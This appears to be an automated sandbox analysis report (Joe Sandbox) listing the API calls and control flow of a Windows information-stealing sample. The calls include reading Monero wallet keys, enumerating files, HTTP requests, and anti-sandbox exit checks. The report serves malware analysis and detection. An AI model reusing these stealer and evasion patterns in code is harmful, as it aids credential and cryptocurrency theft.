                                • Part of subcall function 00DF7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00DF789F
                                • Part of subcall function 00DF78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DF7910
                                • Part of subcall function 00DF78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00DF7917
                                • Part of subcall function 00DF78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00DF792F
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,019789F0,?,00E0110C,?,00000000,?,00E01110,?,00000000,00E00AEF), ref: 00DF6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00DF6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00DF6AF9
                              • Sleep.KERNEL32(00001770), ref: 00DF6B04
                              • CloseHandle.KERNEL32(?,00000000,?,019789F0,?,00E0110C,?,00000000,?,00E01110,?,00000000,00E00AEF), ref: 00DF6B1A
                              • ExitProcess.KERNEL32 ref: 00DF6B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2931873225-0
                              • Opcode ID: 5b4e27818a69aa005a35e791c877479305493ca5731c881276e699cbdef3d54d
                              • Instruction ID: 0a1bc0551e240922864c0483e7bac509a0741df9ddf694739a3975680913dea2
                              • Opcode Fuzzy Hash: 5b4e27818a69aa005a35e791c877479305493ca5731c881276e699cbdef3d54d
                              • Instruction Fuzzy Hash: 33311AB0A0020CAADB14FBE4D856BFE7738EF04340F558528F746A6585DFB46A05CBB6
                              Function 00DF6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1436 df6af3 1437 df6b0a 1436->1437 1439 df6b0c-df6b22 call df6920 call df5b10 CloseHandle ExitProcess 1437->1439 1440 df6aba-df6ad7 call dfaad0 OpenEventA 1437->1440 1445 df6ad9-df6af1 call dfaad0 CreateEventA 1440->1445 1446 df6af5-df6b04 CloseHandle Sleep 1440->1446 1445->1439 1446->1437
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,019789F0,?,00E0110C,?,00000000,?,00E01110,?,00000000,00E00AEF), ref: 00DF6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00DF6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00DF6AF9
                              • Sleep.KERNEL32(00001770), ref: 00DF6B04
                              • CloseHandle.KERNEL32(?,00000000,?,019789F0,?,00E0110C,?,00000000,?,00E01110,?,00000000,00E00AEF), ref: 00DF6B1A
                              • ExitProcess.KERNEL32 ref: 00DF6B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: 156f17488948e83f23429fa38d0a442716a49feed983da466a42606560be1e4e
                              • Instruction ID: 3e0108aea8969ebf7f9e2e3e0620b6b33698e1c4fecdb1dcbe119ef16b602b5b
                              • Opcode Fuzzy Hash: 156f17488948e83f23429fa38d0a442716a49feed983da466a42606560be1e4e
                              • Instruction Fuzzy Hash: 2BF03A70A4020DEEE720AFA09C0ABBD7A34FB04701F25C514FB47A2985CBB59540DA75
                              Function 00DE47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00DE4839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00DE4849
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: fa76210ef3c79b22c2eafe147e8468d791ccd4be4965e6da313807ee2ff3baad
                              • Instruction ID: d1546075fb7cafd55be47d547193d9fd5680105ec917cece10753845230615cc
                              • Opcode Fuzzy Hash: fa76210ef3c79b22c2eafe147e8468d791ccd4be4965e6da313807ee2ff3baad
                              • Instruction Fuzzy Hash: 16215EB1D00209ABDF10DFA5EC49ADE7B74FB04320F108625FA15A7281EB706A09CB91
                              Function 00DF51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                                • Part of subcall function 00DE6280: InternetOpenA.WININET(00E00DFE,00000001,00000000,00000000,00000000), ref: 00DE62E1
                                • Part of subcall function 00DE6280: StrCmpCA.SHLWAPI(?,0197F1D8), ref: 00DE6303
                                • Part of subcall function 00DE6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00DE6335
                                • Part of subcall function 00DE6280: HttpOpenRequestA.WININET(00000000,GET,?,0197E7B8,00000000,00000000,00400100,00000000), ref: 00DE6385
                                • Part of subcall function 00DE6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00DE63BF
                                • Part of subcall function 00DE6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DE63D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00DF5228
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: 11fa6535237faafe645e9c73abaf81ddd6c0f5b547c04f95f826be6b58b38728
                              • Instruction ID: 8299f482215c091760ec78914c1c55964bc9f5ce4960a9e24ec80778791d32ef
                              • Opcode Fuzzy Hash: 11fa6535237faafe645e9c73abaf81ddd6c0f5b547c04f95f826be6b58b38728
                              • Instruction Fuzzy Hash: 69110AB090014CAACB14FF68D952AFD7338EF50340F41C158FA0E5A596EF70AB0AC6B1
                              Function 00DE1220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1493 de1220-de1247 call df89b0 GlobalMemoryStatusEx 1496 de1249-de1271 call dfda00 * 2 1493->1496 1497 de1273-de127a 1493->1497 1499 de1281-de1285 1496->1499 1497->1499 1501 de129a-de129d 1499->1501 1502 de1287 1499->1502 1504 de1289-de1290 1502->1504 1505 de1292-de1294 ExitProcess 1502->1505 1504->1501 1504->1505
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00DE123E
                              • ExitProcess.KERNEL32 ref: 00DE1294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 803317263-2766056989
                              • Opcode ID: 7429e0d3aa74132e123e3a07f82effc272f9099ac3c898946abd461a3c0efebc
                              • Instruction ID: 52d2796ee8b1e690762d989eaecef1d1e16b0a8596825505437dc55bbd92c06a
                              • Opcode Fuzzy Hash: 7429e0d3aa74132e123e3a07f82effc272f9099ac3c898946abd461a3c0efebc
                              • Instruction Fuzzy Hash: 4E014FB4A40348EADB10EBD5CC4ABADB778EB14701F248044E705B6180D6745545876D
                              Function 00DE1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00DE112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00DE1132
                              • ExitProcess.KERNEL32 ref: 00DE1143
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: 006a2a3027303f024b81575af62aff2fd5a91c2432c521e7297b1fec1faacdde
                              • Instruction ID: cd3d264b999ae83080c3c26c25ed3f10978f10a5358405ae3fa051df80d7cb73
                              • Opcode Fuzzy Hash: 006a2a3027303f024b81575af62aff2fd5a91c2432c521e7297b1fec1faacdde
                              • Instruction Fuzzy Hash: 95E0E674B45348FFE7306FA19C0AB0D7678EB04B01F204055F709B75C4DAF9264097A9
                              Function 00DE10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00DE10B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00DE10F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 5effc5ef2d8bbc05047399315e778d4869b560db53a6114a07da9b2c871f80d4
                              • Instruction ID: c377df6434874f4081a25bf0665ab8614473a71cd170f93be9ddc10e015e77fc
                              • Opcode Fuzzy Hash: 5effc5ef2d8bbc05047399315e778d4869b560db53a6114a07da9b2c871f80d4
                              • Instruction Fuzzy Hash: E0F0E971741208BBE7249AA49C49FBAB7DCE705B15F300444F544E3280D5729E00DB64
                              Function 00DE1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00DF78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DF7910
                                • Part of subcall function 00DF78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00DF7917
                                • Part of subcall function 00DF78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00DF792F
                                • Part of subcall function 00DF7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00DE11B7), ref: 00DF7880
                                • Part of subcall function 00DF7850: RtlAllocateHeap.NTDLL(00000000), ref: 00DF7887
                                • Part of subcall function 00DF7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00DF789F
                              • ExitProcess.KERNEL32 ref: 00DE11C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: f4b92cb80c78a9f42a3a7001d3d8dfc495f5c6880c0a0199eb9a235b1b1d7d63
                              • Instruction ID: ab1d251a089515670c8e74e2fca8508880186640dc2458443640521f24c8d3ba
                              • Opcode Fuzzy Hash: f4b92cb80c78a9f42a3a7001d3d8dfc495f5c6880c0a0199eb9a235b1b1d7d63
                              • Instruction Fuzzy Hash: 14E012B5B1430997CF347BB1AC0AB3A329CDB14385F194424FB09D3602FE2AE8509679

                              Non-executed Functions

                              Function 00DF38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00DF38CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 00DF38E3
                              • lstrcat.KERNEL32(?,?), ref: 00DF3935
                              • StrCmpCA.SHLWAPI(?,00E00F70), ref: 00DF3947
                              • StrCmpCA.SHLWAPI(?,00E00F74), ref: 00DF395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00DF3C67
                              • FindClose.KERNEL32(000000FF), ref: 00DF3C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: f1e6290e2fc369efdad92a24caa63f84ba2f40b313b55d29c4bfeb48040d8186
                              • Instruction ID: f92c9dc85cb33f9e1e48e1dbe2828f98cd93b49ed44fa7524a8fd676ee7182f6
                              • Opcode Fuzzy Hash: f1e6290e2fc369efdad92a24caa63f84ba2f40b313b55d29c4bfeb48040d8186
                              • Instruction Fuzzy Hash: 21A12DB1A00219ABDB34EF64DC85FFA7378FB48300F058588E64E96545EB759B84CF62
                              Function 00DEBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                                • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                              • FindFirstFileA.KERNEL32(00000000,?,00E00B32,00E00B2B,00000000,?,?,?,00E013F4,00E00B2A), ref: 00DEBEF5
                              • StrCmpCA.SHLWAPI(?,00E013F8), ref: 00DEBF4D
                              • StrCmpCA.SHLWAPI(?,00E013FC), ref: 00DEBF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00DEC7BF
                              • FindClose.KERNEL32(000000FF), ref: 00DEC7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
